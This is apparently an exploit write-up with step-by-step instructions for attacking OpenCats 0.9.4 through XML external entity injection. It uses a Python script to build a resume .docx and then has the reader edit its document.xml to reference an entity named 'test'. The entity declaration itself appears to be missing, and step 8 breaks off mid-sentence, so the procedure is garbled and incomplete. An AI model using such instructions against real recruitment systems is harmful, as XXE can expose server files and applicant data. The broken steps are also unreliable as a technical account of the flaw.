#Author : Raed Ahsan #Platform : OpenCats #Version : 0.9.4 #Date : 20/09/2021 #LinkedIn : https://linkedin.com/in/raed-ahsan <===============================================================================> *INSTRUCTIONS FOR EXPLOITING THE OPENCATS 0.9.4* <===============================================================================> 1 ) Create a file called "cv.py" 2 ) Paste the following into the cv.py file: from docx import Document document = Document() paragraph = document.add_paragraph("YOUR NAME") document.save("resume.docx") 3 ) Run the cv.py 4 ) a resume.docx file has been created. 5 ) unzip the resume.docx 6 ) cd (change directory) to word/ 7 ) use your editor and open document.xml 8 ) After the first line where ]> 9 ) Find where your name is written in the document.xml. The code will look something like this: YOUR_NAME&test;